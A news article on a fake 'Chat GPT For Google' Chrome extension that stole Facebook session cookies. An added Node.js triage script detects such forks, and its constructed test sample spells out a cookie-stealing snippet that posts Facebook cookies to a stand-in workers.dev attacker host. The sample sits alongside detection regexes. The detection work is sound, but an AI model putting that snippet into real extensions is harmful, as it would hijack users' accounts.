Bogus ChatGPT extension steals Facebook cookies
All aboard the chatbot hype train! Next stop: Fraud
Google has removed a ChatGPT extension from the Chrome store that steals Facebook session cookies – but not before more than 9,000 users installed the account-compromising bot.
The malicious extension – Chat GPT For Google (note the erroneous space in the name of the chatbot) – is very similar in name and code to the real ChatGPT For Google extension. In fact, the phony extension is based on the same open source project used by the actual ChatGPT For Google tool – all the fraudsters had to do was add a few lines of cookie-stealing code.
The end result is an extension that looks and acts just like ChatGPT from a user's perspective, according to Guardio Labs security researchers, who discovered the so-called "FakeGPT."
The cookie thieves push the fake add-on through malicious, sponsored Google Search results for "Chat GPT 4," the researchers said, thus capitalizing on users who want to try out the latest version of the chatbot.
And because the scam extension was offered in the official Chrome store, users likely assumed it was the real thing.
Well done on that curation, Google.
"Based on version 1.16.6 of the open source project, this FakeGPT variant does only one specific malicious action, right after installation, and the rest is basically the same as the genuine code – leaving no reasons to suspect," Nati Tal, head of Guardio Labs, wrote in a blog post.
That one specific malicious action is to filter Facebook-related cookies from the full list acquired via the Chrome Extension API. The forked code also encrypts the cookies list with AES, and smuggles the stolen sweets back to the attacker's command-and-control server hosted on the workers.dev service.
This is notable because it's the same service used by the original FakeGPT variant, which Guardio Labs also discovered. That earlier one allowed attackers to hijack business Facebook accounts under the guise of a ChatGPT Chrome extension.
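The pattern described above (a fork of a legitimate extension that adds a few lines reading Facebook cookies and posting them to a workers.dev host) is easy to spot once you know to look for it. The following is an added example, not code from the article, from Guardio Labs or from either extension: a Node.js static triage pass over an unpacked extension that flags the "cookies" permission, cookie reads, facebook.com references and outbound calls, and, when the upstream open-source release is on hand, restricts the scan to lines the fork added. The manifest, scripts, the `encryptAes` name and the host `attacker-placeholder.workers.dev` are all constructed sample input, not artefacts from the real extension.

```javascript
// Added example (not from the article or Guardio Labs): static triage of an
// unpacked Chrome extension for the FakeGPT shape described in the article.
// Manifest, scripts and host names below are constructed sample input.

const COOKIE_READ = /\b(chrome|browser)\.cookies\.(getAll|get)\s*\(/;
const TARGET_DOMAIN = /facebook\.com/i;
const EXFIL_HOST = /\.workers\.dev\b/i;
const NETWORK_CALL = /\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b/;

// Lines present in the fork but absent from upstream. A multiset difference is
// enough here: moved or reordered lines are ignored, only genuinely new ones kept.
function addedLines(upstreamSrc, forkSrc) {
  const seen = new Map();
  for (const l of upstreamSrc.split("\n")) seen.set(l, (seen.get(l) || 0) + 1);
  const added = [];
  forkSrc.split("\n").forEach((l, i) => {
    const n = seen.get(l) || 0;
    if (n > 0) seen.set(l, n - 1);
    else added.push({ line: i + 1, text: l });
  });
  return added;
}

function scanLines(file, lines) {
  const findings = [];
  for (const { line, text } of lines) {
    const where = `${file}:${line}`;
    if (COOKIE_READ.test(text)) findings.push({ kind: "cookie-read", where, text: text.trim() });
    if (TARGET_DOMAIN.test(text)) findings.push({ kind: "target-domain", where, text: text.trim() });
    if (EXFIL_HOST.test(text)) findings.push({ kind: "exfil-host", where, text: text.trim() });
    if (NETWORK_CALL.test(text)) findings.push({ kind: "network-call", where, text: text.trim() });
  }
  return findings;
}

// manifest: parsed manifest.json; scripts: { filename: source };
// upstream (optional): { filename: source } from the genuine project release.
function triageExtension(manifest, scripts, upstream = {}) {
  const findings = [];
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of perms) {
    if (p === "cookies" || p === "<all_urls>") {
      findings.push({ kind: "permission", where: "manifest.json", text: p });
    }
  }
  for (const [file, src] of Object.entries(scripts)) {
    const lines = file in upstream
      ? addedLines(upstream[file], src)
      : src.split("\n").map((text, i) => ({ line: i + 1, text }));
    findings.push(...scanLines(file, lines));
  }
  return findings;
}

// A cookie read plus an outbound path (network call or known exfil host) is the
// FakeGPT shape; a cookie permission or read on its own only merits a look.
function verdict(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  if (kinds.has("cookie-read") && (kinds.has("network-call") || kinds.has("exfil-host"))) return "high";
  if (kinds.has("cookie-read") || kinds.has("permission")) return "review";
  return "low";
}

// Constructed sample: a benign upstream service worker, and a fork that keeps
// the genuine code and appends a cookie read, an encrypt step and a POST.
const UPSTREAM = {
  "background.js": [
    "chrome.runtime.onMessage.addListener((msg, sender, reply) => {",
    '  if (msg.type === "query") reply({ ok: true });',
    "});",
  ].join("\n"),
};
const FORK_SCRIPTS = {
  "background.js": [
    "chrome.runtime.onMessage.addListener((msg, sender, reply) => {",
    '  if (msg.type === "query") reply({ ok: true });',
    "});",
    'chrome.cookies.getAll({ domain: "facebook.com" }, (cookies) => {',
    "  const body = encryptAes(JSON.stringify(cookies)); // encryptAes: placeholder name",
    '  fetch("https://attacker-placeholder.workers.dev/c", { method: "POST", body });',
    "});",
  ].join("\n"),
};
const FORK_MANIFEST = {
  manifest_version: 3,
  name: "Chat GPT For Google",
  permissions: ["storage", "cookies"],
  host_permissions: ["<all_urls>"],
};

const SAMPLE_FINDINGS = triageExtension(FORK_MANIFEST, FORK_SCRIPTS, UPSTREAM);
console.log(verdict(SAMPLE_FINDINGS), SAMPLE_FINDINGS);
```

Run it with `node triage.js`; on the constructed sample it reports a "high" verdict with six findings, all on lines the fork added. In practice you would point it at the directory produced by unzipping a `.crx` and at a checkout of the upstream project at the version the extension claims (the article quotes 1.16.6), and treat the regexes as a starting point rather than a complete signature: a minified bundle or a string built at runtime will defeat line-oriented matching, so the permission check and the network-call check are the ones to weight when the diff comes back empty.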
Once they've stolen the cookies, miscreants can then change the account login information to lock the real users out, and use the hijacked pages as promotional bots or to spread extremist propaganda.
This latest example of cybercriminals jumping on the ChatGPT hype train illustrates how the "misuse of ChatGPT's brand and popularity just keeps on rising, used not only for Facebook account harvesting and not only with malicious fake Extensions for Chrome," according to Tal.
While some crooks may be using the AI to develop polymorphic malware, most won't need to work nearly that hard. All it takes is a buzzy new tech tool, and tricking someone into clicking on a malicious link or downloading a phony app or extension. ®